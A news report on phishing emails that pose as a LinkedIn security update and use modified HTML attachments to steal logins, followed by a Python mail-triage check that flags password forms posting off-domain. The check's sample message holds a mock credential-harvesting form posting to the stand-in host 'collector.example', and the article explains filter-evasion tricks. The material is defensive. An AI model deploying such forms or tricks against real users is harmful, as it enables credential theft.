Scammers use LinkedIn security update to steal credentials

Soma Tah

BANGALORE, INDIA: Security vendor Symantec has issued an alert following an increasing number of phishing emails over the last week that claim to be from LinkedIn Support.

The body of the email claims that irregular activities have prompted a “compulsory security update” for the recipients’ LinkedIn account.

The email goes on to say that in order to secure their account, the recipient needs to download the attached form (an HTML attachment) and follow the instructions.

The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker.

Curiously, the email uses a lowercase I instead of a capital i when spelling “LinkedIn”. The difference in characters is indiscernible to the eye and functions as a way to evade mail filters.

However, the most important technique used here is the HTML attachment. This method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished.
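
As an added example (not part of Symantec's alert or the original article), here is a mail-triage check for the attachment technique described above: it parses a message, reads each HTML attachment, and reports login forms whose password field would be posted to a host outside linkedin.com. The sample message, the host `collector.example` and the function names are constructed for illustration.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message; the host and file name are placeholders.
SAMPLE = """\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Download the attached form and follow the instructions.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="update.html"

<form action="https://collector.example/post.php" method="post">
<input name="session_key"><input type="password" name="session_password"></form>
--b1--
"""

class FormAudit(HTMLParser):
    """Record the action of each <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self.action, self.password_forms = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.action is not None:
            self.password_forms.append(self.action)
    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None

def off_brand(host, brand="linkedin.com"):
    """True when host is neither the brand domain nor a subdomain of it."""
    return not ("." + (host or "").lower().rstrip(".")).endswith("." + brand)

def audit_message(raw, brand="linkedin.com"):
    """Return (attachment name, form action) for password forms posting off-brand."""
    findings = []
    for part in message_from_string(raw, policy=policy.default).iter_attachments():
        if part.get_content_type() == "text/html":
            parser = FormAudit()
            parser.feed(part.get_content())
            findings += [(part.get_filename(), act) for act in parser.password_forms
                         if off_brand(urlparse(act).hostname, brand)]
    return findings
```

A form with a relative or empty action is also reported, since a page opened from a local attachment has no legitimate LinkedIn origin to post back to.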

LinkedIn users should consider turning on two-step verification, a true “security update” that provides an extra layer of security. With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to log in without having access to the user’s mobile phone.

To learn more about LinkedIn’s two-step verification, please visit its help center.
